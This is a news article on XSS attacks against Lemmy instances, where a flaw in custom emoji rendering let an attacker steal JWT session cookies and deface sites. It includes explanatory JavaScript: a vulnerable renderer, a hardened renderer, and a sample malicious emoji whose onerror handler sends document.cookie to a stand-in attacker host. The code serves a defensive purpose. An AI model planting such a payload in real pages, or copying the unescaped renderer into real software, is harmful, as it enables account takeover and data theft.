Lemmy, an open source package used to build independent link aggregators and discussion boards, runs on multiple websites that were recently attacked by hackers who appear to have exploited a zero-day vulnerability.
Although each Lemmy-based site is operated by a distinct person or group, the sites are federated, so a user of one site can read and reply to posts hosted on other servers. At present there are roughly 1,100 sites with a combined user base of more than 850,000.
The Attacks
Recently, someone began exploiting a cross-site scripting (XSS) flaw in the way Lemmy renders custom emoji. The attacker used it to deface pages on a number of well-known sites, including Lemmy.world, the largest instance, which has more than 100,000 users.
The attacker also stole [JWT] authentication cookies, compromising many user accounts across several major Lemmy sites. Some of the stolen cookies belonged to administrators, and those were used to deface the sites. According to Lemmy.world’s administrators, only users who clicked links to rogue pages during the incident were at risk.
“All affected users’ private messages and email addresses were accessible to attackers thanks to the stolen cookies,” they continued. The attacker appears to have used the altered sites to redirect visitors to offensive or disturbing content.
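The two pieces of the attack described above, an emoji renderer that does not escape attacker-controlled fields and a payload that exfiltrates the session cookie, as an added example. This is illustrative code written for this page, not Lemmy’s or lemmy-ui’s own implementation; the emoji table, the attacker and image URLs, and the function names are all constructed for the demonstration.

```javascript
// Added example (not Lemmy code): how an unescaped attribute turns a custom
// emoji definition into an XSS sink, and the escaping that closes it.

// Constructed sample: a custom emoji table as an instance admin might define it.
const customEmojis = {
  lemmy: { url: "https://example.invalid/emoji/lemmy.png", alt: "lemmy" },
};

// Vulnerable renderer: interpolates the emoji fields straight into HTML, so a
// double quote in `alt` closes the attribute and a `>` closes the tag.
function renderEmojiVulnerable(emoji) {
  return `<img class="emoji" src="${emoji.url}" alt="${emoji.alt}" title="${emoji.alt}">`;
}

// Encode the five characters that can break out of an HTML attribute value.
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Only allow http(s) image sources; rejects javascript:, data: and the like.
function isSafeUrl(u) {
  return /^https?:\/\//i.test(String(u));
}

// Hardened renderer: every field is escaped, and the URL is scheme-checked.
function renderEmojiHardened(emoji) {
  const url = isSafeUrl(emoji.url) ? emoji.url : "";
  const alt = escapeHtmlAttr(emoji.alt);
  return `<img class="emoji" src="${escapeHtmlAttr(url)}" alt="${alt}" title="${alt}">`;
}

// Crude reviewer check: a single rendered emoji must open exactly one tag.
// Any extra "<" means a field was able to start markup of its own.
function tagCount(html) {
  return (html.match(/</g) || []).length;
}

// Constructed malicious emoji definition. The payload closes the alt attribute
// and the img tag, then opens a second img whose onerror handler ships the
// session cookie to an attacker-controlled host (attacker.invalid is made up).
const maliciousEmoji = {
  url: "https://example.invalid/x.png",
  alt: `"><img src=x onerror="fetch('https://attacker.invalid/?c='+document.cookie)">`,
};

// Stand-alone demo: the vulnerable output contains three "<img" tags (the real
// one plus one injected via alt and one via title); the hardened output contains one.
console.log("vulnerable:", renderEmojiVulnerable(maliciousEmoji));
console.log("hardened:  ", renderEmojiHardened(maliciousEmoji));
console.log("tag counts:", tagCount(renderEmojiVulnerable(maliciousEmoji)),
            tagCount(renderEmojiHardened(maliciousEmoji)));
```

Two caveats worth keeping in mind when reading the payload. The `document.cookie` exfiltration only works if the session token lives in a cookie that script can read; marking the cookie `HttpOnly` does not fix the XSS, but it removes the cookie as the easy prize and forces the attacker to act through the victim’s browser instead. And escaping at the render layer is the fix that actually matters: validating emoji definitions at creation time is a useful extra layer, but the renderer cannot assume every row in the table was created through that path.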
Several Lemmy sites had already been taken offline before the attack began.
In addition to applying the fix, site operators have been urged to rotate their instance’s JWT secret, which invalidates every token issued before the change (including the stolen ones), and users have been urged to change their passwords.